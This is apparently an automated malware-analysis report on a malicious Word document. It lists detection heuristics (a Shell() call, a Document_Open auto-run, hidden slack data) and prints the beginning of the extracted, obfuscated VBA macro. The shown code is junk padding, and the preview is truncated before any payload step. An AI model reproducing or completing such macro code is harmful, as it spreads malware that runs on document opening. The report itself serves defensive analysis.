MALICIOUS
162
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is an OLE document containing a VBA macro that utilizes the Shell() function, a strong indicator of malicious intent. The macro appears to be obfuscated with complex string manipulations and loops, suggesting it's designed to download and execute a second-stage payload. The presence of the Document_Open macro further supports this, as it's commonly used to trigger malicious actions upon document opening.
Heuristics 5
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
OLE document has large unaccounted-for region high OLE_SLACK_ANOMALYOLE file is 121,344 bytes but its declared streams total only 61,105 bytes — 60,239 bytes (50%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 27981 bytes |
SHA-256: f5831995232b3e8f8a35712c05428ba19904a457f082416f18076c4ebde73d76 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub RHqPsn(HKEubD As Integer)
For XJBvLH = 0 To 139
tGvuUxJ = LTrim("*_fM$FRA$qit%OQd")
gvGBb = Right("kyeHbrpAA^.YEyky", 5)
mDUmeu = 1162 - 785 - 1554
nLcfAUtT = 1782 + 1246 + 134
fQhIMqD = 568 - 1005 - 483
tGvuUxJ = 672 + 574 + 552
Next XJBvLH
XJodD = Right("B.GvXI$GIud", 4)
fQhIMqD = LTrim("kdEOcBcSWg.NF")
While ZQctlm < 330
mDUmeu = StrReverse("C )y-YFp$EJ)BK")
nLcfAUtT = LTrim("gb#)OoX_SVbm%W_")
nLcfAUtT = 354 + 1535 + 1816
nLcfAUtT = Right("ZqTsIERt_@vJz$", 3)
QJlnFad = Space(3)
QJlnFad = UCase("rorx%D(e_]c]zMvA?oUB")
FEUwfn = UCase("WzVmQZ#dXE")
nLcfAUtT = 1655 + 1815 + 1523
ZQctlm = ZQctlm + 1
Wend
While zQRGEi < 195
gvGBb = RTrim("ifranqwx*SnMYq")
XJodD = RTrim("Oq])eXsM-w")
gvGBb = "CYA_yRYdgEgE" + "jkUB&)[V_G" + "^TfVTkaryg"
zQRGEi = zQRGEi + 3
Wend
fQhIMqD = StrReverse("uEx[YEX*L]QR")
FEUwfn = StrReverse("GXaKA?qeFscT")
For WfxjzP = 0 To 46
XJodD = Space(14)
tGvuUxJ = Right("Am)Jgfsxy#u_^[hpYNtc", 2)
FEUwfn = Left("XCBnbmT!u$$!Gka]K$!", 3)
gvGBb = LTrim("r bBSCwNuvj(eqBCX")
FEUwfn = 331 + 168 + 113
QJlnFad = Space(2)
QJlnFad = StrReverse("Jjg!AflZQo-Q!W)^")
nLcfAUtT = LTrim("P(ukm_o@DDZBwMhFxig")
fQhIMqD = Right("^@YDpu^JRudnPwYk% ", 4)
Next WfxjzP
XJodD = 759 + 1394 + 1879
nLcfAUtT = Right("@@]y]%DdfbTSem-hlU", 4)
nLcfAUtT = LTrim("t!?).%b#nGsm")
fQhIMqD = StrReverse("Y(H-lglpI.z-MkT^S%T")
XJodD = StrReverse("F*verYXiQT^D]VS[")
fQhIMqD = UCase("-yAZ%%aKnfrlg$uY")
nLcfAUtT = 1607 + 1642 + 1621
gvGBb = 1659 + 1631 + 305
FEUwfn = StrReverse("kMznokQhDy")
FEUwfn = LTrim("_pVaxrrEbzg%)b")
FEUwfn = LTrim("mzhaCWMSw!j]")
tGvuUxJ = StrReverse("R[FGXO)mH-vr)ws.")
gvGBb = Right("aPE?GPfJ[YY", 2)
gvGBb = Right("HpWWEmt^mu", 5)
gvGBb = UCase("esswFq[Qo%M.D")
mDUmeu = UCase("BoLJWsxhY]")
mDUmeu = StrReverse("]Nq_rKj@mu$yCt")
FEUwfn = Space(11)
FEUwfn = Right("-.Y[beJ%]Co!%xWv", 2)
tGvuUxJ = "DeCRxb-!njXr&O" + "_HIjhP?FhPC" + "CcEp&qKpymN"
XJodD = Left("TOFZ_)EKhbOWQ", 5)
For VIjTqp = 0 To 25
gvGBb = LTrim("K%ZNAS!phhp?n%@nNR")
fQhIMqD = 1049 + 1610 + 519
fQhIMqD = Right("KfyT*HGE]ofG", 3)
QJlnFad = 1899 - 942 - 1417
XJodD = 1785 - 1609 - 1728
nLcfAUtT = RTrim("^uKqFcuo#I&")
tGvuUxJ = "lBLMpKHp(UvNBQS(u@f" + "AKisK*Tuc&qAsSsL!" + "#jeS#?wxM.t"
Next VIjTqp
End Sub
Private Function jOmAKP(CpEsVN As Integer, huvgzgP As Boolean, ahcDkAc As String, DAIgHSs As String) As String
nLcfAUtT = RTrim("opvvRZdTJJO^t_OXx")
mDUmeu = 240 - 234 - 1230
QJlnFad = "JkljA(aKUD?a" + "xI%d& baSTV vnbl" + "RQGget-eY*c!g"
QJlnFad = "CIhiFVf@qtBLt" + "$_i.cgW($cEzjSP" + "LUjyiPBUKSR"
XJodD = RTrim("g!MN!fdFlyQguaPB(kNp")
While ImkwzW < 352
FEUwfn = 1105 + 1086 + 1316
FEUwfn = Left("?$l)FH.P$K]zA.ckm", 3)
mDUmeu = Right("JXuJW&a-$Pp", 3)
ImkwzW = ImkwzW + 1
Wend
While UIPelX < 298
tGvuUxJ = LTrim(")KqWSpu!ynTIH-iA")
mDUmeu = "(OzX)oxoTV!AiHY?hlks" + "EqpfMxONRa " + "sfeXwOG- $T%ovUbu)"
XJodD = StrReverse("PAtaSt^@rhVZ#!z]IYa")
gvGBb = 1785 + 1951 + 902
QJlnFad = 1922 - 686 - 803
XJodD = 1257 - 1403 - 600
tGvuUxJ = Right("(&Oz$ij]VLG&nQhRP-", 4)
FEUwfn = RTrim("LyI!lYQjN&pUm)")
FEUwfn = LTrim("k*leXAv#ZwfDPl")
QJlnFad = "?sFM nzzMo" + "pNFfeW!LX?Z_xcCQ" + "hnXw(-wzzMUcFv!GQ"
UIPelX = UIPelX + 3
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.